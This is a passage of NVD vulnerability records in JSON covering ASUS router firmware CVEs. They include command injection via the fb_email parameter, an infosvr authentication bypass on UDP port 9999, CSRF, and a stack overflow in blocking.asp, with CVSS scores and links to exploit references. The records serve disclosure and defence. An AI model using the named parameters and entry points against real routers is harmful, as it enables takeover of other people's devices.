"cpe:2.3:h:asus:rt-ac3200:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFE8A3B1-284B-40EC-872E-B8F7103F108C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac51u:-:*:*:*:*:*:*:*", "matchCriteriaId": "24748D40-7F43-44DA-BBEF-46D85D2AADA3", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "55EE62D6-1E29-4E84-8944-D3D68E212140", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac55u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4C7DF43D-7EEE-405C-BB2B-822936BCB4A0", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56r:-:*:*:*:*:*:*:*", "matchCriteriaId": "E32874C8-05B6-44A1-B118-DC2F4FE62134", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56s:-:*:*:*:*:*:*:*", "matchCriteriaId": "63A1E548-F12D-4BF7-9C01-1325A725FF91", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3E87BA7-FACD-46B2-BE2A-9EFEA3C62C17", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66r:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D59C40A-D9BA-455B-9F9E-D3B6FB80BC13", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u-b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "CD103F76-C432-4577-8465-831E0314D8D4", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F6B0EC4-797D-4059-AA90-EC09A49FE105", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac68p:-:*:*:*:*:*:*:*", "matchCriteriaId": "5713F0F3-B616-42B7-A0D8-7983F00E79FE", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac68u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E23D00B-76E3-438C-8023-3D7CC6AEEE15", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*", "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac87u:-:*:*:*:*:*:*:*", "matchCriteriaId": "317B2498-88CE-431F-97E1-EFE7F7E34E05", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "81008E66-B5E8-4DE5-B14D-E6983C69BC29", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-acrh12:-:*:*:*:*:*:*:*", "matchCriteriaId": "1EF9FF00-2DDC-4900-8A93-A51E41EA5C17", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-acrh13:-:*:*:*:*:*:*:*", "matchCriteriaId": "41AF79B6-D208-4357-A08D-D1AB6F136F59", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax3000:-:*:*:*:*:*:*:*", "matchCriteriaId": "1515AF83-732F-489B-A25C-5D67A03A3B25", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "4D747097-702E-4046-9723-01A586336534", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax58u:-:*:*:*:*:*:*:*", "matchCriteriaId": "855509B2-CE29-4A04-B412-C160139EA392", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB91E047-5AE1-4CA0-9E67-84170D79770C", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ax92u:-:*:*:*:*:*:*:*", "matchCriteriaId": "8EB70155-390A-472E-A0AA-59A18ADD2BF5", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-g32:-:*:*:*:*:*:*:*", "matchCriteriaId": "5AD16BBF-DB02-4E96-A310-82C13898B29D", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n10\\+d1:-:*:*:*:*:*:*:*", "matchCriteriaId": "B8794D4A-5E8C-432D-A2FB-9CF86158E8D5", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n10e:-:*:*:*:*:*:*:*", "matchCriteriaId": "9AFCC588-AAA6-45FA-8D1F-E57C7693D27A", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n14u:-:*:*:*:*:*:*:*", "matchCriteriaId": "85B0C29C-29A5-4659-8D76-9241B13682DF", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n16:-:*:*:*:*:*:*:*", "matchCriteriaId": "3E016FE0-0A28-49AA-A213-38A5F7728FE2", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n19:-:*:*:*:*:*:*:*", "matchCriteriaId": "507A5D4D-CAF9-4417-9EA6-B499E04D1CDD", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n56r:-:*:*:*:*:*:*:*", "matchCriteriaId": "14C092D3-14B2-4DBB-8C20-D15F0BA33FA8", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n600:-:*:*:*:*:*:*:*", "matchCriteriaId": "481C7F6F-23A4-4B8B-8E14-44ADFCBE8C58", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n65u:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5567C97-0AE2-429B-B4D7-1CF501BD2C07", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66r:-:*:*:*:*:*:*:*", "matchCriteriaId": "EB4466BA-09EB-43F0-9610-6574F10B5810", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "7A60BB38-11FC-48C4-B592-29C6C3A6FEAE", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered in ASUSWRT 3.0.0.4.384.20308. When processing the /start_apply.htm POST data, there is a command injection issue via shell metacharacters in the fb_email parameter. By using this issue, an attacker can control the router and get shell." }, { "lang": "es", "value": "Se detect\u00f3 un problema en ASUSWRT versi\u00f3n 3.0.0.4.384.20308. Al procesar los datos POST del archivo /start_apply.htm, se presenta un problema de inyecci\u00f3n de comandos por medio de metacaracteres de shell en el par\u00e1metro fb_email. Al usar este problema, un atacante puede controlar el enrutador y conseguir la shell." } ], "id": "CVE-2018-20334", "lastModified": "2024-11-21T04:01:15.487", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-03-20T01:15:22.357", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://starlabs.sg/advisories/18-20334/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://starlabs.sg/advisories/18-20334/" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-78" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
t-mobile | tm-ac1900 | 3.0.0.4.376_3169 | |
asus | wrt_firmware | 3.0.0.4.376.2524-g0012f52 | |
asus | wrt_firmware | 3.0.0.4.376_1071 | |
asus | rt-ac66u | * | |
asus | rt-n66u | * |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:t-mobile:tm-ac1900:3.0.0.4.376_3169:*:*:*:*:*:*:*", "matchCriteriaId": "919D9673-1FCA-431D-9F30-643AAEFAC1DA", "vulnerable": true } ], "negate": false, "operator": "OR" } ] }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:wrt_firmware:3.0.0.4.376.2524-g0012f52:*:*:*:*:*:*:*", "matchCriteriaId": "DBCA7A1C-02A8-445A-B6AE-BB9C8FAF6E3D", "vulnerable": true }, { "criteria": "cpe:2.3:o:asus:wrt_firmware:3.0.0.4.376_1071:*:*:*:*:*:*:*", "matchCriteriaId": "2156DB35-853F-4C69-89D6-4111FD849AD9", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:*:*:*:*:*:*:*:*", "matchCriteriaId": "106D80BC-400A-4996-8A4E-68D3F24B200F", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66u:*:*:*:*:*:*:*:*", "matchCriteriaId": "98F88197-8E64-468C-8F36-281ED8E3716A", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change." }, { "lang": "es", "value": "common.c en infosvr en ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, y otras versiones, utilizado en RT-AC66U, RT-N66U, y otros routers, no comprueba correctamente la direcci\u00f3n MAC para una solicitud, lo que permite a atacantes remotos evadir la autenticaci\u00f3n y ejecutar comandos arbitrarios a trav\u00e9s de un paquete NET_CMD_ID_MANU_CMD en el puerto UDP 9999. NOTA: este problema fue mapeado incorrectamente a CVE-2014-10000, pero este identificador es inv\u00e1lido debido a su uso como ejemplo de cambio de la sintaxis de identificadores de CVEs del 2014." } ], "id": "CVE-2014-9583", "lastModified": "2024-11-21T02:21:11.230", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ] }, "published": "2015-01-08T20:59:02.243", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://www.exploit-db.com/exploits/35688" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/jduck/asus-cmd" }, { "source": "cve@mitre.org", "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "source": "cve@mitre.org", "url": "https://www.exploit-db.com/exploits/44524/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://www.exploit-db.com/exploits/35688" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/jduck/asus-cmd" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://www.exploit-db.com/exploits/44524/" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-264" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://www.securityfocus.com/archive/1/531194 | Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.securityfocus.com/archive/1/531194 | Third Party Advisory, VDB Entry |
Vendor | Product | Version | |
---|---|---|---|
asus | rt-n56u_firmware | 3.0.0.4.374_979 | |
asus | rt-n56u | - | |
asus | rt-n10u_firmware | 3.0.0.4.374_168 | |
asus | rt-n10u | - | |
asus | dsl-n55u_firmware | 3.0.0.4.374_1397 | |
asus | dsl-n55u | - | |
asus | rt-ac66u_firmware | 3.0.0.4.374_2050 | |
asus | rt-ac66u | - | |
asus | rt-n15u_firmware | 3.0.0.4.374_16 | |
asus | rt-n15u | - | |
asus | rt-n53_firmware | 3.0.0.4.374_311 | |
asus | rt-n53 | - | |
asus | rt-n16_firmware | 3.0.0.4.374_979 | |
asus | rt-n16 | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:3.0.0.4.374_979:*:*:*:*:*:*:*", "matchCriteriaId": "71FB53A0-E6FE-44AB-9C58-3D171D014C89", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n10u_firmware:3.0.0.4.374_168:*:*:*:*:*:*:*", "matchCriteriaId": "829CAB34-EED3-4CE7-94D7-CAD9065F23EC", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n10u:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC4DE1E4-5956-47DE-A3E5-41BACE56ECDD", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:dsl-n55u_firmware:3.0.0.4.374_1397:*:*:*:*:*:*:*", "matchCriteriaId": "9AF2B1DD-066D-4CF0-8B20-4BB0004AEDC2", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:dsl-n55u:-:*:*:*:*:*:*:*", "matchCriteriaId": "B81970C5-B766-4D2E-91EE-ADD5A9B77FF8", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.374_2050:*:*:*:*:*:*:*", "matchCriteriaId": "06072740-9813-463A-BE8D-005494458924", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n15u_firmware:3.0.0.4.374_16:*:*:*:*:*:*:*", "matchCriteriaId": "373F0934-4234-4047-9FD1-100847A5BDF2", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n15u:-:*:*:*:*:*:*:*", "matchCriteriaId": "FF1E024B-4966-43E5-882D-549E3DCF09FF", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n53_firmware:3.0.0.4.374_311:*:*:*:*:*:*:*", "matchCriteriaId": "C1B18E8F-EB3B-4766-8053-5C6890178305", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n53:-:*:*:*:*:*:*:*", "matchCriteriaId": "D5055A58-33A0-4CC4-A855-50ABE0A4F358", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n16_firmware:3.0.0.4.374_979:*:*:*:*:*:*:*", "matchCriteriaId": "A8FDC5CE-25FC-489E-9E4C-88FC8C885576", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n16:-:*:*:*:*:*:*:*", "matchCriteriaId": "3E016FE0-0A28-49AA-A213-38A5F7728FE2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "ASUS RT-N56U devices allow CSRF." }, { "lang": "es", "value": "Los dispositivos ASUS RT-N56U, permiten un ataque de tipo CSRF." } ], "id": "CVE-2013-3093", "lastModified": "2024-11-21T01:52:59.640", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-01-28T21:15:11.560", "references": [ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://www.securityfocus.com/archive/1/531194" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://www.securityfocus.com/archive/1/531194" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-352" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://pagedout.institute/download/PagedOut_001_beta1.pdf | Exploit, Third Party Advisory | |
cve@mitre.org | https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS | Product | |
af854a3a-2127-422b-91ae-364da2661108 | https://pagedout.institute/download/PagedOut_001_beta1.pdf | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS | Product |
Vendor | Product | Version | |
---|---|---|---|
asus | rt-ac66u_firmware | * | |
asus | rt-ac66u | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E89720D-90F4-443E-8875-90B365A5D650", "versionEndExcluding": "3.0.0.4.382.50470", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id." }, { "lang": "es", "value": "Un desbordamiento de b\u00fafer en la regi\u00f3n stack de la memoria en el firmware Asuswrt-Merlin para dispositivos ASUS versiones anteriores a 384.4 y el firmware ASUS versiones anteriores a 3.0.0.4.382.50470 para dispositivos, permite a atacantes remotos ejecutar c\u00f3digo arbitrario al proporcionar una cadena larga en la p\u00e1gina block.asp por medio de una petici\u00f3n GET o POST. Los par\u00e1metros vulnerables son flag, mac y cat_id." } ], "id": "CVE-2018-8879", "lastModified": "2024-11-21T04:14:30.903", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2019-11-21T16:15:11.720", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://pagedout.institute/download/PagedOut_001_beta1.pdf" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://pagedout.institute/download/PagedOut_001_beta1.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-787" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
Vendor | Product | Version | |
---|---|---|---|
asus | rt-ac51u_firmware | 3.0.0.4.380.8228 | |
asus | rt-ac51u | - | |
asus | rt-ac58u_firmware | 3.0.0.4.380.8228 | |
asus | rt-ac58u | - | |
asus | rt-ac66u_firmware | 3.0.0.4.380.8228 | |
asus | rt-ac66u | - | |
asus | rt-ac1750_firmware | 3.0.0.4.380.8228 | |
asus | rt-ac1750 | - | |
asus | rt-n12_d1_firmware | 3.0.0.4.380.8228 | |
asus | rt-n12_d1 | - | |
asus | rt-ac52u_b1_firmware | 3.0.0.4.380.10446 | |
asus | rt-ac52u_b1 | - | |
asus | rt-ac1200_firmware | 3.0.0.4.380.10446 | |
asus | rt-ac1200 | - | |
asus | rt-n600_firmware | 3.0.0.4.380.10446 | |
asus | rt-n600 | - | |
asus | rt-ac55u_firmware | 3.0.0.4.382.50276 | |
asus | rt-ac55u | - | |
asus | rt-ac55uhp_firmware | 3.0.0.4.382.50276 | |
asus | rt-ac55uhp | - | |
asus | rt-ac86u_firmware | 3.0.0.4.384.20648 | |
asus | rt-ac86u | - | |
asus | rt-acrh13_firmware | 3.0.0.4.380.8228 | |
asus | rt-acrh13 | - | |
asus | rt-ac2900_firmware | 3.0.0.4.384.20648 | |
asus | rt-ac2900 | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac51u_firmware:3.0.0.4.380.8228:*:*:*:*:*:*:*", "matchCriteriaId": "11CD0A73-1D7B-478F-9623-C913EB77BAD3", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac51u:-:*:*:*:*:*:*:*", "matchCriteriaId": "24748D40-7F43-44DA-BBEF-46D85D2AADA3", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac58u_firmware:3.0.0.4.380.8228:*:*:*:*:*:*:*", "matchCriteriaId": "8A255109-04A4-493E-99EA-79CC71073F88", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac58u:-:*:*:*:*:*:*:*", "matchCriteriaId": "50D22A86-7CA0-49EC-8B1D-47D6B7E8E15F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:3.0.0.4.380.8228:*:*:*:*:*:*:*", "matchCriteriaId": "1FECFFE5-4BCB-4148-B314-C23F8D1C8C64", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1750_firmware:3.0.0.4.380.8228:*:*:*:*:*:*:*", "matchCriteriaId": "12588A08-D81C-497A-855C-996E07E0EE22", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1750:-:*:*:*:*:*:*:*", "matchCriteriaId": "59001E8D-E835-464A-915A-AAF59F2F397F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n12_d1_firmware:3.0.0.4.380.8228:*:*:*:*:*:*:*", "matchCriteriaId": "36E280DA-7FF8-4C2F-BA29-6004BA554C0F", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n12_d1:-:*:*:*:*:*:*:*", "matchCriteriaId": "3BEAAA78-FBF0-48CB-97EE-29DBFDDAFF2F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac52u_b1_firmware:3.0.0.4.380.10446:*:*:*:*:*:*:*", "matchCriteriaId": "FA8BCB1D-5830-409F-9F4B-8F88ABC50326", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac52u_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "959BF67B-D5CF-4E55-981F-56149DCCC927", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1200_firmware:3.0.0.4.380.10446:*:*:*:*:*:*:*", "matchCriteriaId": "E26361D0-76A9-470A-A7CD-2596363AA21D", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1200:-:*:*:*:*:*:*:*", "matchCriteriaId": "9BE19DF1-EB89-4CE5-956F-79BD4AD5E52F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n600_firmware:3.0.0.4.380.10446:*:*:*:*:*:*:*", "matchCriteriaId": "27ED9386-FCAF-4A65-BC49-BF3AFFAAD032", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": 